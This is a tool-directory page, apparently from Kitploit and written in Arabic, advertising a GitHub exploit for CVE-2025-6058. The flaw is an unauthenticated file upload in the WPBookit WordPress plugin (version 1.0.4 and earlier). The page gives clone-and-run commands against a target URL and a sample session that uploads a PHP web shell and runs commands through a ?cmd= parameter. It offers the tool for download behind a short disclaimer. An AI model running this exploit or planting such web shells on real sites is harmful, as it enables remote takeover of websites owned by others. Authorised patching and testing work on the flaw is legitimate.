Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-6058 — استغلال رفع ملفات بدون مصادقة في WPBookit لووردبريس ≤ 1.0.4 | Kitploit
أدوات/GitHubGitHub/0xgh057r3c0n/cve-2025-6058
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHub0xgh057r3c0n/cve-2025-6058

CVE-2025-6058

استغلال رفع ملفات بدون مصادقة في WPBookit لووردبريس ≤ 1.0.4

عرض المستودع
12منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

شعار ووردبريس

🚨 CVE-2025-6058 — ووردبريس WPBookit ≤ 1.0.4 استغلال رفع ملفات بدون مصادقة

استغلال رفع ملفات عشوائي بدون مصادقة يستهدف إضافة ووردبريس WPBookit (≤ 1.0.4)
يتيح الاستغلال رفع شيل عن بُعد وتنفيذ أوامر كاملة.

المؤلف: 0xgh057r3c0n


📌 حول الثغرة

CVE-2025-6058 هي ثغرة حرجة تؤثر على إضافة WPBookit في نظام إدارة المحتوى ووردبريس. يمكن لمهاجم غير مصادَق استغلال نقطة نهاية AJAX ضعيفة لرفع ملفات PHP عشوائية، مما يتيح تنفيذ الأوامر عن بُعد (RCE).

  • 🎯 الهدف: نظام إدارة المحتوى ووردبريس (إضافة WPBookit الضعيفة)
  • 📦 الإضافة المتأثرة: WPBookit ≤ 1.0.4
  • ⚠️ مستوى الخطورة: حرج (RCE بدون مصادقة)

  • ✨ الميزات

    • 🔍 يكتشف تلقائيًا إصدار إضافة ووردبريس عبر README.txt
    • 📤 يرفع شيل PHP خفيف (ghost_shell.php)
    • 🖥️ شيل تفاعلي (موجه بأسلوب Parrot)
    • 🌐 بدون مصادقة — لا يتطلب تسجيل الدخول
    • 🎨 مخرجات CLI ملونة

    🚀 دليل الاستخدام

    💻 المتطلبات

    root@kitploit:~
    python3 --version
    pip install requests
    

    ⚙️ تنفيذ الاستغلال

    root@kitploit:~
    git clone https://github.com/0xgh057r3c0n/CVE-2025-6058.git
    cd CVE-2025-6058
    python3 CVE-2025-6058.py -u https://target-wordpress-site.com
    

    🛠️ مثال لجلسة الشيل

    root@kitploit:~
    python3 CVE-2025-6058.py -u https://victim.com
    
    [>] Checking plugin version...
    [+] Found plugin version: 1.0.4
    [!] Target version is vulnerable.
    
    [>] Uploading shell...
    [+] Upload successful.
    [+] Shell URL: https://victim.com/wp-content/uploads/2025/07/ghost_shell.php?cmd=whoami
    
    [!] Interactive GhostShell Started — type 'exit' to quit.
    
    ┌─[gaurav@0xgh057r3c0n]─[/var/www/html]
    └──╼ $ whoami
    www-data
    

    📂 تفاصيل الشيل

    • اسم الملف: ghost_shell.php
    • المسار: /wp-content/uploads/YYYY/MM/ghost_shell.php
    • مثال:
    root@kitploit:~
    https://target-wordpress-site.com/wp-content/uploads/2025/07/ghost_shell.php?cmd=whoami
    

    ⚠️ إخلاء مسؤولية قانوني

    تم تطوير هذا الاستغلال لأغراض تعليمية ولاختبار الاختراق المصرح به فقط. الاستخدام غير المصرح به ضد الأنظمة دون موافقة صريحة غير قانوني.


    📄 الترخيص

    صدر بموجب رخصة MIT


    صُنع لتدقيق أمن ووردبريس 🛡️ بواسطة 0xgh057r3c0n

    تنزيل الأداة